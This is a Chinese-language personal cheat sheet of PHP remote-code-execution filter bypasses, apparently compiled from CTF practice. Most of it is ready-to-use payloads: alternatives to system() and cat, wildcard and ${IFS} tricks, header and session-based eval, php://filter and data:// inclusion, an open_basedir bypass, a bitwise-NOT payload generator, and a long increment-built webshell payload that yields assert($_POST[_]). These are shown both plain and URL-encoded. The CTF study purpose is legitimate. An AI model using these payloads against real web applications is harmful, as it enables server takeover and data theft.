之前做了一大堆的題目 都沒有進行總結 現在來總結一下命令執行 我遇到的內容

這里我打算按照過濾進行總結

依據我做過的題目

過濾system

下面是一些常見的命令執行內容

system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
反引號 同shell_exec() 

過濾cat

有的題目不讓我們讀取

more:一頁一頁的顯示檔案內容less:與 more 類似 head:查看頭幾行tac:從最后一行開始顯示，可以看出 tac 是cat 的反向顯示tail:查看尾幾行nl：顯示的時候，順便輸出行號od:以二進制的方式讀取檔案內容vi:一種編輯器，這個也可以查看vim:一種編輯器，這個也可以查看sort:可以查看paste：可以輸出內容

如果這些也過濾 但是題目是直接給我們一個小馬

/bin/?at flag.txt下面是通過base64返回如果特別極端 過濾數字/???/????64 ????.???我們可以通過base64返回內容或者使用 /???/???/????2 ????.???/usr/bin/bzip2這個會進行壓縮 然后我們訪問 /flag.php.bz2 即可

可以通過這種方式執行 bin下存放著我們許多的命令

過濾空格

${IFS}
$IFS$9
<
<>
%0a
%09

通過__FILE__獲取

__FILE__ 表示當前文件
完整路徑和文件名dirname()
獲取一個網站路徑的目錄名scandir()讀取目錄的文件 然后作為一個數組print_r()打印數組內容localeconv()可以獲取到 當前的數學符號current()指定第一個array_reverse()倒序輸出如果print_r被過濾可以使用highlight_file
next()
指向當前指針的下一位end()
指向數組最后一位reset()
指向數組第一個prev()
指針往回走一位each()
返回當前指針的值 并且指針向前走一位

通過seesion執行命令

print_r(session_id(session_start()))Cookie: PHPSESSID=flag.php

通過請求頭執行命令

system(current(getallheaders()));

通過構造新參數執行命令

很多時候 一些讀取什么的全都沒了 我們無法實現讀取文件

這個時候 我們可以在小馬中再加一個小馬實現其他參數的注入

code=include$_GET[1]?>&1=system('ls')code=show_source(get_defined_vars()["_POST"]["a"])&a=/flaggggggg.txtcode=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.phpcode=require$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

協議讀取

如果題目使用了include類型

data://text/plain,<?php system('tac fla?.php');?>data://text/plain;bvase64,base64加密后的命令

我們就可以使用偽協議來執行命令

繞過open_basedr

c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');} exit(0);?>

短開表達式

data://text/plain,<?=system('tac fla?.?hp');?>

通過POST文件 包含/tmp/臨時文件

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>POST數據包POC</title>
</head>
<body>
<form action="http://cd3eb1d9-31ec-4644-b057-c38153f6a911.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!--鏈接是當前打開的題目鏈接--><label for="file">文件名：</label><input type="file" name="file" id="file"><br><input type="submit" name="submit" value="提交">
</form>
</body>
</html>

這里向網站發包

然后通過正則匹配獲取到文件

?c=.+/???/????????[@-[]

上傳文件的內容如圖所示

只過濾數字 getshell

${_} 返回上一條命令$(())echo $((${_}))   0echo $((~${_}))  -1echo $(($((~${_}))$((~${_}))))  -2echo $(($((~${_}))$((~${_}))$((~${_}))))   -3最后拼湊出來了數字后使用一個取反 將 負數變為正數echo $((~$(($((~${_}))$((~${_}))$((~${_})))))) 2取反會小一位 然后再加一位即可echo $((~$(($((~${_}))$((~${_}))$((~${_}))$((~${_}))))))  3

高亮文件

highlight_file()show_source()var_dump()var_export()配合include

無數字字母RCE

不能加參數

exp = ""
def urlbm(s):ss = ""for each in s:ss += "%" + str(hex(255 - ord(each)))[2:]return f"[~{ss}][!%FF]("
while True:fun = input("Firebasky>: ").strip(")").split("(")exp = ''for each in fun[:-1]:exp += urlbm(each)print(exp)exp += ")" * (len(fun) - 1) + ";"print(exp)

不能加參數的rce

eval(hex2bin(session_id(session_start())));print_r(current(get_defined_vars()));&b=phpinfo();eval(next(getallheaders()));var_dump(getenv(phpinfo()));print_r(scandir(dirname(getcwd()))); //查看上一級目錄的文件print_r(scandir(next(scandir(getcwd()))));//查看上一級目錄的文件

自增

如果過濾取反這些符號 就考慮自增

直接payload

assert($_POST[_]);

$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

然后通過url編碼

%24_%3d%5b%5d%3b%24_%3d%40%22%24_%22%3b%24_%3d%24_%5b'!'%3d%3d'%40'%5d%3b%24___%3d%24_%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24____%3d'_'%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24_%3d%24%24____%3b%24___(%24_%5b_%5d)%3b

取反

<?php$c='phpinfo';
$d=urlencode(~$c);
echo $d;
?>

?payload

?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%D6);eval($_POST[1])

現在目前學到的RCE 就總結在這里了 如果后面還存在 就繼續加進去